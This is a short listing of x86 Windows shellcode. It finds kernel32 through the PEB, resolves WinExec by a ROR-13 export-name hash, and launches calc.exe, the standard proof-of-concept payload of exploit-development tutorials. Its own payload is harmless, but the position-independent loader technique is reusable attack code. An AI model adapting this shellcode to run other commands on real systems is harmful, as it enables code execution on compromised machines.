PUSH ESI ; LOCATE KERNEL32 BASE ADDR
XOR EAX,EAX
MOV EAX,DWORD PTR FS:[EAX+30]
MOV EAX,DWORD PTR DS:[EAX+C]
MOV ESI,DWORD PTR DS:[EAX+1C]
LODS DWORD PTR DS:[ESI]
MOV EAX,DWORD PTR DS:[EAX+8]
POP ESI
MOV EBP,EAX
MOV EBX,F4C07457 ; HASH FOR WINEXEC
XOR ECX,ECX ; RESOLVE WINEXEC FUNCTION ADDR
MOV EDI,DWORD PTR SS:[EBP+3C]
MOV EDI,DWORD PTR SS:[EBP+EDI+78]
ADD EDI,EBP
next_function_pointer: ;SET A LABEL HERE
MOV EDX,DWORD PTR DS:[EDI+20]
ADD EDX,EBP
MOV ESI,DWORD PTR DS:[EDX+ECX*4]
ADD ESI,EBP
XOR EAX,EAX
CDQ
hash_next_byte: ;SET A LABEL HERE
LODS BYTE PTR DS:[ESI]
ROR EDX,0D
ADD EDX,EAX
TEST AL,AL
JNZ SHORT hash_next_byte
INC ECX
CMP EDX,EBX
JNZ SHORT next_function_pointer
DEC ECX
MOV EBX,DWORD PTR DS:[EDI+24]
ADD EBX,EBP
MOV CX,WORD PTR DS:[EBX+ECX*2]
MOV EBX,DWORD PTR DS:[EDI+1C]
ADD EBX,EBP
MOV EAX,DWORD PTR DS:[EBX+ECX*4]
ADD EAX,EBP
MOV EBX,11111111 ; PUSH CALC.EXE, VISIBLE AND CALL FUNCTION
XOR EBX,11111111
PUSH EBX
PUSH 6578652E
PUSH 636C6163
MOV EDI,ESP
PUSH EDI
PUSH EDI
CALL EAX